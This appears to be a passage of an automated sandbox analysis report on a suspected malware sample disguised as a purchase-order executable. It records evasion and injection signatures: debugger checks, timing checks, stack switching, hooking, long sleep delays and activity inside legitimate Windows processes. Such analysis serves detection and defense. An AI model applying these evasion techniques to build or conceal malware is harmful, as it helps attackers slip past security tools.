Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030BB011 push cs; retf	3_2_030BB01A
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030BBB69 push ecx; ret	3_2_030BBB6A
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030B1931 pushfd ; retf	3_2_030B193B
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030BB98E push FFFFFFADh; ret	3_2_030BB990
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030BDD8B push eax; iretd	3_2_030BDDEC
Source: C:\Windows\SysWOW64\fc.exe	Code function: 3_2_030B5C28 pushad ; iretd	3_2_030B5C51

Source: PO_62401394_MITech_20250601.exe

Static PE information: section name: .text entropy: 7.995271347901756

Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	API/Special instruction interceptor: Address: 7FFB4A4AD144
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	API/Special instruction interceptor: Address: 7FFB4A4B0594
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	API/Special instruction interceptor: Address: 7FFB4A4AFF74
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	API/Special instruction interceptor: Address: 7FFB4A4AD6C4
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	API/Special instruction interceptor: Address: 7FFB4A4AD864
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	API/Special instruction interceptor: Address: 7FFB4A4AD004
Source: C:\Windows\SysWOW64\fc.exe	API/Special instruction interceptor: Address: 7FFB4A4AD144
Source: C:\Windows\SysWOW64\fc.exe	API/Special instruction interceptor: Address: 7FFB4A4B0594
Source: C:\Windows\SysWOW64\fc.exe	API/Special instruction interceptor: Address: 7FFB4A4AD764
Source: C:\Windows\SysWOW64\fc.exe	API/Special instruction interceptor: Address: 7FFB4A4AD324
Source: C:\Windows\SysWOW64\fc.exe	API/Special instruction interceptor: Address: 7FFB4A4AD364
Source: C:\Windows\SysWOW64\fc.exe	API/Special instruction interceptor: Address: 7FFB4A4AD004
Source: C:\Windows\SysWOW64\fc.exe	API/Special instruction interceptor: Address: 7FFB4A4AFF74
Source: C:\Windows\SysWOW64\fc.exe	API/Special instruction interceptor: Address: 7FFB4A4AD6C4
Source: C:\Windows\SysWOW64\fc.exe	API/Special instruction interceptor: Address: 7FFB4A4AD864
Source: C:\Windows\SysWOW64\fc.exe	API/Special instruction interceptor: Address: 7FFB4A4AD604

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe

Code function: 0_2_0104088E rdtsc

0_2_0104088E

Source: C:\Windows\SysWOW64\fc.exe

Window / User API: threadDelayed 9852

Jump to behavior

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\fc.exe	API coverage: 2.5 %

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 2860	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 4696	Thread sleep count: 121 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 4696	Thread sleep time: -242000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 4696	Thread sleep count: 9852 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe TID: 4696	Thread sleep time: -19704000s >= -30000s	Jump to behavior

Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\fc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\fc.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\fc.exe

Code function: 3_2_030BC870 FindFirstFileW,FindNextFileW,FindClose,

3_2_030BC870

Source: RAVCpl64.exe, 00000002.00000002.23284955297.0000000000693000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWOA%SystemRoot%\system32\mswsock.dllSERPROFILE=C:\Users\userwindir=C:\WindowsZES_ENABLE_SYSMAN=100
Source: fc.exe, 00000003.00000002.23284109384.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000004.00000002.22716831722.000001EAC0437000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\fc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe

Code function: 0_2_0104088E rdtsc

0_2_0104088E

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe

Code function: 0_2_00C37CA3 LdrLoadDll,

0_2_00C37CA3

Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFC0F6 mov eax, dword ptr fs:[00000030h]	0_2_00FFC0F6
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01030118 mov eax, dword ptr fs:[00000030h]	0_2_01030118
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108A130 mov eax, dword ptr fs:[00000030h]	0_2_0108A130
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103415F mov eax, dword ptr fs:[00000030h]	0_2_0103415F
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFA093 mov ecx, dword ptr fs:[00000030h]	0_2_00FFA093
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFC090 mov eax, dword ptr fs:[00000030h]	0_2_00FFC090
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01006179 mov eax, dword ptr fs:[00000030h]	0_2_01006179
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01004180 mov eax, dword ptr fs:[00000030h]	0_2_01004180
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01004180 mov eax, dword ptr fs:[00000030h]	0_2_01004180
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01004180 mov eax, dword ptr fs:[00000030h]	0_2_01004180
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103E1A4 mov eax, dword ptr fs:[00000030h]	0_2_0103E1A4
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103E1A4 mov eax, dword ptr fs:[00000030h]	0_2_0103E1A4
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010341BB mov ecx, dword ptr fs:[00000030h]	0_2_010341BB
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010341BB mov eax, dword ptr fs:[00000030h]	0_2_010341BB
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010341BB mov eax, dword ptr fs:[00000030h]	0_2_010341BB
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010101C0 mov eax, dword ptr fs:[00000030h]	0_2_010101C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010101C0 mov eax, dword ptr fs:[00000030h]	0_2_010101C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A1E3 mov eax, dword ptr fs:[00000030h]	0_2_0100A1E3
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A1E3 mov eax, dword ptr fs:[00000030h]	0_2_0100A1E3
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A1E3 mov eax, dword ptr fs:[00000030h]	0_2_0100A1E3
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A1E3 mov eax, dword ptr fs:[00000030h]	0_2_0100A1E3
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A1E3 mov eax, dword ptr fs:[00000030h]	0_2_0100A1E3
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01008009 mov eax, dword ptr fs:[00000030h]	0_2_01008009
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042010 mov ecx, dword ptr fs:[00000030h]	0_2_01042010
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF81EB mov eax, dword ptr fs:[00000030h]	0_2_00FF81EB
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01030044 mov eax, dword ptr fs:[00000030h]	0_2_01030044
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01086040 mov eax, dword ptr fs:[00000030h]	0_2_01086040
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01006074 mov eax, dword ptr fs:[00000030h]	0_2_01006074
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01006074 mov eax, dword ptr fs:[00000030h]	0_2_01006074
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01096090 mov eax, dword ptr fs:[00000030h]	0_2_01096090
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010400A5 mov eax, dword ptr fs:[00000030h]	0_2_010400A5
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010860A0 mov eax, dword ptr fs:[00000030h]	0_2_010860A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010860A0 mov eax, dword ptr fs:[00000030h]	0_2_010860A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010860A0 mov eax, dword ptr fs:[00000030h]	0_2_010860A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010860A0 mov eax, dword ptr fs:[00000030h]	0_2_010860A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010860A0 mov eax, dword ptr fs:[00000030h]	0_2_010860A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010860A0 mov eax, dword ptr fs:[00000030h]	0_2_010860A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010860A0 mov eax, dword ptr fs:[00000030h]	0_2_010860A0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFA147 mov eax, dword ptr fs:[00000030h]	0_2_00FFA147
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFA147 mov eax, dword ptr fs:[00000030h]	0_2_00FFA147
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFA147 mov eax, dword ptr fs:[00000030h]	0_2_00FFA147
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108C0E0 mov ecx, dword ptr fs:[00000030h]	0_2_0108C0E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A630E mov eax, dword ptr fs:[00000030h]	0_2_010A630E
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101E310 mov eax, dword ptr fs:[00000030h]	0_2_0101E310
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101E310 mov eax, dword ptr fs:[00000030h]	0_2_0101E310
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101E310 mov eax, dword ptr fs:[00000030h]	0_2_0101E310
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103631F mov eax, dword ptr fs:[00000030h]	0_2_0103631F
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01038322 mov eax, dword ptr fs:[00000030h]	0_2_01038322
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01038322 mov eax, dword ptr fs:[00000030h]	0_2_01038322
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01038322 mov eax, dword ptr fs:[00000030h]	0_2_01038322
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFC2B0 mov ecx, dword ptr fs:[00000030h]	0_2_00FFC2B0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103A350 mov eax, dword ptr fs:[00000030h]	0_2_0103A350
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103E363 mov eax, dword ptr fs:[00000030h]	0_2_0103E363
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103E363 mov eax, dword ptr fs:[00000030h]	0_2_0103E363
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103E363 mov eax, dword ptr fs:[00000030h]	0_2_0103E363
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103E363 mov eax, dword ptr fs:[00000030h]	0_2_0103E363
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103E363 mov eax, dword ptr fs:[00000030h]	0_2_0103E363
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103E363 mov eax, dword ptr fs:[00000030h]	0_2_0103E363
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103E363 mov eax, dword ptr fs:[00000030h]	0_2_0103E363
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103E363 mov eax, dword ptr fs:[00000030h]	0_2_0103E363
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E372 mov eax, dword ptr fs:[00000030h]	0_2_0107E372
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E372 mov eax, dword ptr fs:[00000030h]	0_2_0107E372
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E372 mov eax, dword ptr fs:[00000030h]	0_2_0107E372
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E372 mov eax, dword ptr fs:[00000030h]	0_2_0107E372
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102237A mov eax, dword ptr fs:[00000030h]	0_2_0102237A
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01080371 mov eax, dword ptr fs:[00000030h]	0_2_01080371
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01080371 mov eax, dword ptr fs:[00000030h]	0_2_01080371
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102A390 mov eax, dword ptr fs:[00000030h]	0_2_0102A390
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102A390 mov eax, dword ptr fs:[00000030h]	0_2_0102A390
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102A390 mov eax, dword ptr fs:[00000030h]	0_2_0102A390
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A43BA mov eax, dword ptr fs:[00000030h]	0_2_010A43BA
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010A43BA mov eax, dword ptr fs:[00000030h]	0_2_010A43BA
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107C3B0 mov eax, dword ptr fs:[00000030h]	0_2_0107C3B0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010063CB mov eax, dword ptr fs:[00000030h]	0_2_010063CB
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010343D0 mov ecx, dword ptr fs:[00000030h]	0_2_010343D0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108E3DD mov eax, dword ptr fs:[00000030h]	0_2_0108E3DD
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010843D5 mov eax, dword ptr fs:[00000030h]	0_2_010843D5
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF821B mov eax, dword ptr fs:[00000030h]	0_2_00FF821B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFA200 mov eax, dword ptr fs:[00000030h]	0_2_00FFA200
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103A22B mov eax, dword ptr fs:[00000030h]	0_2_0103A22B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103A22B mov eax, dword ptr fs:[00000030h]	0_2_0103A22B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103A22B mov eax, dword ptr fs:[00000030h]	0_2_0103A22B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01080227 mov eax, dword ptr fs:[00000030h]	0_2_01080227
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01080227 mov eax, dword ptr fs:[00000030h]	0_2_01080227
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01080227 mov eax, dword ptr fs:[00000030h]	0_2_01080227
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01020230 mov ecx, dword ptr fs:[00000030h]	0_2_01020230
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFC3C7 mov eax, dword ptr fs:[00000030h]	0_2_00FFC3C7
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFE3C0 mov eax, dword ptr fs:[00000030h]	0_2_00FFE3C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFE3C0 mov eax, dword ptr fs:[00000030h]	0_2_00FFE3C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFE3C0 mov eax, dword ptr fs:[00000030h]	0_2_00FFE3C0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E289 mov eax, dword ptr fs:[00000030h]	0_2_0107E289
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010242AF mov eax, dword ptr fs:[00000030h]	0_2_010242AF
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010242AF mov eax, dword ptr fs:[00000030h]	0_2_010242AF
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF8347 mov eax, dword ptr fs:[00000030h]	0_2_00FF8347
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF8347 mov eax, dword ptr fs:[00000030h]	0_2_00FF8347
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FF8347 mov eax, dword ptr fs:[00000030h]	0_2_00FF8347
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFE328 mov eax, dword ptr fs:[00000030h]	0_2_00FFE328
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFE328 mov eax, dword ptr fs:[00000030h]	0_2_00FFE328
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_00FFE328 mov eax, dword ptr fs:[00000030h]	0_2_00FFE328
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A2E0 mov eax, dword ptr fs:[00000030h]	0_2_0100A2E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A2E0 mov eax, dword ptr fs:[00000030h]	0_2_0100A2E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A2E0 mov eax, dword ptr fs:[00000030h]	0_2_0100A2E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A2E0 mov eax, dword ptr fs:[00000030h]	0_2_0100A2E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A2E0 mov eax, dword ptr fs:[00000030h]	0_2_0100A2E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100A2E0 mov eax, dword ptr fs:[00000030h]	0_2_0100A2E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010082E0 mov eax, dword ptr fs:[00000030h]	0_2_010082E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010082E0 mov eax, dword ptr fs:[00000030h]	0_2_010082E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010082E0 mov eax, dword ptr fs:[00000030h]	0_2_010082E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010082E0 mov eax, dword ptr fs:[00000030h]	0_2_010082E0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010102F9 mov eax, dword ptr fs:[00000030h]	0_2_010102F9
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010102F9 mov eax, dword ptr fs:[00000030h]	0_2_010102F9
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010102F9 mov eax, dword ptr fs:[00000030h]	0_2_010102F9
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010102F9 mov eax, dword ptr fs:[00000030h]	0_2_010102F9
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010102F9 mov eax, dword ptr fs:[00000030h]	0_2_010102F9
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010102F9 mov eax, dword ptr fs:[00000030h]	0_2_010102F9
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010102F9 mov eax, dword ptr fs:[00000030h]	0_2_010102F9
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010102F9 mov eax, dword ptr fs:[00000030h]	0_2_010102F9
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01002500 mov eax, dword ptr fs:[00000030h]	0_2_01002500
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E507 mov eax, dword ptr fs:[00000030h]	0_2_0102E507
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E507 mov eax, dword ptr fs:[00000030h]	0_2_0102E507
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E507 mov eax, dword ptr fs:[00000030h]	0_2_0102E507
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E507 mov eax, dword ptr fs:[00000030h]	0_2_0102E507
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E507 mov eax, dword ptr fs:[00000030h]	0_2_0102E507
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E507 mov eax, dword ptr fs:[00000030h]	0_2_0102E507
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E507 mov eax, dword ptr fs:[00000030h]	0_2_0102E507
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0102E507 mov eax, dword ptr fs:[00000030h]	0_2_0102E507
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103C50D mov eax, dword ptr fs:[00000030h]	0_2_0103C50D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103C50D mov eax, dword ptr fs:[00000030h]	0_2_0103C50D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108C51D mov eax, dword ptr fs:[00000030h]	0_2_0108C51D
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101252B mov eax, dword ptr fs:[00000030h]	0_2_0101252B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101252B mov eax, dword ptr fs:[00000030h]	0_2_0101252B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101252B mov eax, dword ptr fs:[00000030h]	0_2_0101252B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101252B mov eax, dword ptr fs:[00000030h]	0_2_0101252B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101252B mov eax, dword ptr fs:[00000030h]	0_2_0101252B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101252B mov eax, dword ptr fs:[00000030h]	0_2_0101252B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101252B mov eax, dword ptr fs:[00000030h]	0_2_0101252B
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01042539 mov eax, dword ptr fs:[00000030h]	0_2_01042539
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01036540 mov eax, dword ptr fs:[00000030h]	0_2_01036540
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01038540 mov eax, dword ptr fs:[00000030h]	0_2_01038540
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101E547 mov eax, dword ptr fs:[00000030h]	0_2_0101E547
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0100254C mov eax, dword ptr fs:[00000030h]	0_2_0100254C
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01096550 mov eax, dword ptr fs:[00000030h]	0_2_01096550
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010CA553 mov eax, dword ptr fs:[00000030h]	0_2_010CA553
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0101C560 mov eax, dword ptr fs:[00000030h]	0_2_0101C560
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103A580 mov eax, dword ptr fs:[00000030h]	0_2_0103A580
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103A580 mov eax, dword ptr fs:[00000030h]	0_2_0103A580
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E588 mov eax, dword ptr fs:[00000030h]	0_2_0107E588
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0107E588 mov eax, dword ptr fs:[00000030h]	0_2_0107E588
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_01032594 mov eax, dword ptr fs:[00000030h]	0_2_01032594
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0108C592 mov eax, dword ptr fs:[00000030h]	0_2_0108C592
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010885AA mov eax, dword ptr fs:[00000030h]	0_2_010885AA
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010045B0 mov eax, dword ptr fs:[00000030h]	0_2_010045B0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010045B0 mov eax, dword ptr fs:[00000030h]	0_2_010045B0
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_0103C5C6 mov eax, dword ptr fs:[00000030h]	0_2_0103C5C6
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010805C6 mov eax, dword ptr fs:[00000030h]	0_2_010805C6
Source: C:\Users\user\Desktop\PO_62401394_MITech_20250601.exe	Code function: 0_2_010365D0 mov eax, dword ptr fs:[00000030h]	0_2_010365D0
